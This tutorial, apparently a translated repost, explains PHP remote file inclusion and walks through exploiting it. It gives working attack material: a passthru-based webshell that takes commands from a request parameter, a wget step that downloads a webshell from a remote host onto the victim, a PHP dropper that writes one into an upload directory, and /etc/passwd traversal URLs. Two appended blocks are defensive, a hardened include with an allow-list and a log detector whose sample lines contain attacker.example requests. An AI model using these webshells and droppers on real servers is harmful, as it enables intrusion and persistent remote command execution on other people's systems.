First, let's discuss the file inclusion vulnerability. The first question is: what is a "remote file inclusion vulnerability"? The answer: when the server uses a PHP feature (function) to include a file and does not strictly filter the source of the file to be included, it can be made to include a malicious file, and we can construct this malicious file to achieve evil purposes.
Almost all CGI programs have such bugs, but the specific forms differ.
I. Dangerous functions involved: include(), require(), include_once() and require_once()
include() & require(): include and run the specified file.
These two constructs are identical except for how they handle failure. include() generates a warning, while require() causes a fatal error. In other words, if you want to stop processing the page when a file is missing, use require(). This is not the case with include(): the script will continue to run.
If allow_url_fopen is enabled in PHP (it is on by default), you can also specify the file to include by URL (over HTTP or another supported wrapper protocol) instead of a local path. If the target server interprets the target file as PHP code, you can pass variables to the included file with a query string, as with an HTTP GET.
For details, refer to: #
require_once() & include_once()
The require_once() and include_once() statements include and run the specified file during script execution. This behavior is similar to require(); the only difference is that if the file's code has already been included, it will not be included again. This is useful when the same file might be included more than once during script execution and you want to ensure it is included only once, to avoid function redefinition and variable reassignment.
For details, refer to: #
II. Why file inclusion?
When programmers write programs, they do not like to do the same thing or write the same code (such as some common functions) several times, so the shared code is put in a separate file, such as share.php, and then included from other files. In PHP, the functions listed above are used for this. The workflow is: if a file needs share.php, I write include("share.php") and can then use the functions in share.php. The file name here is hard-coded, so there is no problem or vulnerability. So where exactly is the problem?
Sometimes you cannot know in advance which file to include. For example, look at the index.php code below:
The code is as follows:
<?php
if ($_GET['page']) {
    include $_GET['page'];
} else {
    include "home.php";
}
?>
A normal piece of PHP code. How does it work? This involves the meaning of $_GET, which I won't go into here (or I could write a separate HTTP article). If you still don't know GET, POST and so on, you need to look up some relevant material on Google.
The above code can be called in a form like: # or http://www.jb51.net/php/index.php?page=downloads.php:
1. Submit the URL above; index.php GETs the value of page ($_GET['page']).
2. Check whether $_GET['page'] is empty. If it is not empty (main.php here), include that file.
3. If $_GET['page'] is empty, run the else branch and include the home.php file.
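As an added example (not code from the original post), here is a hardened replacement for the index.php above: the page name is checked against an allow-list and the resolved path is confined to a pages directory with realpath(). It assumes the includable pages live in ./pages/ as bare names such as downloads.php, and that php.ini has allow_url_include=Off (required for remote includes since PHP 5.2) and display_errors=Off so a failed include does not print the absolute path shown in the warning later in the post.

```php
<?php
// Added example, not the original post's code. Hardened form of:
//   if ($_GET['page']) { include $_GET['page']; } else { include "home.php"; }
// Assumption: pages live in ./pages/<name>.php; the names below are illustrative.
declare(strict_types=1);

// Allow-list: the only values that are ever turned into a file name.
const ALLOWED_PAGES = ['home', 'downloads', 'about'];

/**
 * Map an untrusted page name to a local file path, or return null.
 * Three independent checks: allow-list membership, a path built from a
 * constant prefix (user input never becomes a path on its own), and a
 * realpath() confinement check so that no resolved file can sit outside
 * $pagesDir even if an allow-list entry is ever mistyped.
 */
function resolve_page(string $page, string $pagesDir): ?string
{
    if (!in_array($page, ALLOWED_PAGES, true)) {
        return null; // "hello.php", "../../etc/passwd" and "http://..." all stop here
    }
    $base = realpath($pagesDir);
    $path = realpath($pagesDir . '/' . $page . '.php');
    if ($base === false || $path === false) {
        return null; // pages directory or page file does not exist
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null; // resolved outside the pages directory (symlink, etc.)
    }
    return $path;
}

$requested = $_GET['page'] ?? 'home'; // same default as the original home.php
$file = resolve_page((string) $requested, __DIR__ . '/pages');
if ($file === null) {
    http_response_code(404);
    exit('Unknown page'); // generic message: no include() warning, no path disclosure
}
require $file; // require, not include: a missing page is a hard error, never a silent fall-through
```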
III. Why is this a vulnerability?
You may say this is good: it is very convenient to include files dynamically according to the URL, so how can this cause a vulnerability? The answer is: we are not well behaved; we always like to be different from others and will not follow the author's links, and we may want to specify our own file to include (call). For example, we randomly enter the following URL: http://www.jb51.net/php/index.php?page=hello.php. Our index.php program then dutifully follows the steps above: it gets page as hello.php and goes to include(hello.php). Now the problem occurs: there is no hello.php file, so a warning is reported when it is included, similar to the following:
Quote:
Warning: include(hello.php) [function.include]: failed to open stream: No such file or directory in /vhost/php/index.php on line 3
Warning: include() [function.include]: Failed opening 'hello.php' for inclusion (include_path='.:') in /vhost/php/index.php on line 3
Note that the first warning says the specified hello.php file cannot be found, that is, there is no file at the given path; the second warning says that, because the file was not found, the include of it failed.
IV. How to exploit it
As we saw above, there is a problem, so how can such a vulnerability be exploited? There are actually many exploitation methods, but they are essentially similar. Here I will talk about three common ones:
1. Including and reading other files on the target machine
As we saw above, because the obtained parameter page is not filtered, we can freely specify other sensitive files on the target host. For example, in the previous warning we can see the exposed absolute path (/vhost/php/), so we can probe repeatedly to include other files, such as specifying the URL http://www.jb51.net/php/index.php?page=./txt.txt to read txt.txt from the current directory, or using ../../ to jump directories (when ../ is not filtered). You can also directly specify an absolute path to read sensitive system files, such as the URL http://www.jb51.net/php/index.php?page=/etc/passwd. If the target host does not have strict permission restrictions, or Apache runs with relatively high privileges, you can read the content of this file; otherwise you will get a warning similar to "open_basedir restriction in effect".
2. Including a runnable PHP trojan
If allow_url_fopen is enabled on the target host, we can include a remote file with any suffix (the suffix is not important, as long as the content is PHP code).
CODE: [Copy to clipboard]
--------------------------------------------------------------------------------
<?php
if (get_magic_quotes_gpc()) { $_REQUEST["cmd"] = stripslashes($_REQUEST["cmd"]); } // remove the escape characters (the backslashes added to the string)
ini_set("max_execution_time", 0); // set the execution time limit for this file; 0 is unlimited
echo "1.s.T"; // print the start marker of the returned output
passthru($_REQUEST["cmd"]); // run the command
echo "1.s.T"; // print the end marker of the returned output
?>
The purpose of the above file is to accept the command specified by cmd, call the passthru function to execute it, and return the output between the two 1.s.T markers. Save this file on a server of our own (it can be a host that does not support PHP), as long as it can be accessed over HTTP, for example at the address http://www.jb51.net/#.txt. Then we can construct the following URL on the vulnerable host to use it: http://www.jb51.net/php/index.php?page=#. The command to be executed is given in cmd. Other commonly used commands (taking UNIX as an example) are as follows:
Quote:
ll: list the directory and its files (equivalent to dir in Windows)
pwd: view the current absolute path
id, whoami: view the current user
wget: download the file at the specified URL
and so on; search BAIDU for more.
The above method gets us a Webshell (although this PHP file is not on the target machine, it is indeed a Webshell, isn't it? Haha).
3. Including a PHP file that creates a file
Some people may feel that it is more reassuring to get a real Webshell on the target machine: if someone notices and fixes the vulnerability, we can no longer remotely include the "pseudo" Webshell above, right? We can understand this mentality, so let's continue. To get a real Webshell, we also talk about two common methods:
1) Use a command such as wget to download a Webshell
This is simple and often used. In the pseudo Webshell we obtained above we can execute commands, so we can also call a very powerful tool in the system, wget. This command is powerful; you can find a lot of its parameters on Google, and they will certainly confuse you. Haha, we don't need to be that complicated: we will use -O (--output-document=FILE, write the document to FILE).
The premise is that you put a Webshell containing PHP code in a place that can be accessed over HTTP or FTP, such as http://www.jb51.net/1stphp.txt, where this file contains the content of the Webshell. Then run the following URL in the pseudo Webshell: #://www.jb51.net/#.txt?cmd=wget # -O 1stphp.php. If the current directory is writable, you get a Webshell named 1stphp.php. If the current directory is not writable, you need to find another method.
2) Create the file with PHP
The previous wget may run into the situation where the current directory cannot be written, or the command is disabled (or not installed) on the target host, and we need to adapt again. We can combine this with the file inclusion vulnerability above and include a PHP script that creates (writes) a file. Its content is as follows:
CODE: [Copy to clipboard]
--------------------------------------------------------------------------------
<?php
$f = file_get_contents("http://www.jb51.net/1stphp.txt"); // open the file stream at the specified path
$ff = fopen("./upload/1st.php", "a"); // find a directory and create a file in it
fwrite($ff, $f); // write the previously opened file stream to the created file
fclose($ff); // close and save the file
?>
This writes the same PHP file we downloaded with wget, but the method is improved and implemented with a PHP script. We can use the above cmd.php with cmd=ll to find a writable directory, for example upload, and create the file under that directory: ./upload/1st.php. Then we have our Webshell.
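An added example, not from the original post: detection logic in PHP 8 that runs over access-log lines and flags the page= values used in sections 1 through 3 above (a remote URL, ../ traversal after URL-decoding, an absolute path). Log lines, host names and addresses are constructed for the example.

```php
<?php
// Added example, not the original post's code: a small detector for the
// page= patterns described above (remote URL, ../ traversal, absolute path)
// in Apache combined-format access log lines. Sample lines are constructed.
declare(strict_types=1);

/** Return why a log line looks like an inclusion attempt, or null if it looks normal. */
function classify_include_request(string $logLine): ?string
{
    // The request target sits in the quoted "METHOD /target HTTP/x.y" field.
    if (!preg_match('/"[A-Z]+ (\S+) HTTP\/[\d.]+"/', $logLine, $m)) {
        return null;
    }
    $query = parse_url($m[1], PHP_URL_QUERY);
    if (!is_string($query)) {
        return null; // no query string at all
    }
    parse_str($query, $params); // also URL-decodes, so %2e%2e%2f becomes ../
    if (!isset($params['page']) || !is_string($params['page'])) {
        return null;
    }
    $page = $params['page'];
    // Any scheme prefix (http://, ftp://, php://, data:) means a remote or wrapper include.
    if (preg_match('#^[a-z][a-z0-9+.-]*:#i', $page)) {
        return 'remote-include';
    }
    if (str_contains($page, '../') || str_contains($page, '..\\')) {
        return 'traversal';
    }
    if ($page !== '' && ($page[0] === '/' || $page[0] === '\\')) {
        return 'absolute-path';
    }
    return null;
}

// Constructed sample log lines, not real traffic.
$sample = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /php/index.php?page=downloads.php HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /php/index.php?page=http://attacker.example/x.txt HTTP/1.1" 200 90',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /php/index.php?page=%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 200 1400',
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /php/index.php?page=/etc/passwd HTTP/1.1" 200 1400',
];
foreach ($sample as $line) {
    $verdict = classify_include_request($line) ?? 'ok';
    echo str_pad($verdict, 16), $line, PHP_EOL; // first line prints ok, the others remote-include, traversal, absolute-path
}
```

Feeding real logs through the same function (one line per call) gives the same three verdicts; a verdict other than ok on a page= value is a direct signal that the include above is being probed.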
V. Postscript
In fact, we could end this topic here. Finally, a few more words. The file inclusion vulnerability is basically a simple vulnerability with a high level of risk, and there are still many systems with it; if you are careful, you can find a lot. Exploitation is flexible: you must be good at analyzing the problem and finding a way to solve it, so that you can make progress.
The vulnerability involves a lot of knowledge that cannot all be covered one by one. You are welcome to ask questions, or you can work it out yourself on Google. Time is short; I hope you will correct any mistakes in the description!
Finally, such things take more time to practice. I will find a specific example to repeat this process to give you a deeper understanding; you can also look for the vulnerabilities you have discovered and share the detailed analysis and exploitation process with everyone! 1st wishes you progress.
The above is the PHP remote file inclusion vulnerability analysis (PHP skills). For more information, see PHP Chinese network (www.php1.cn)!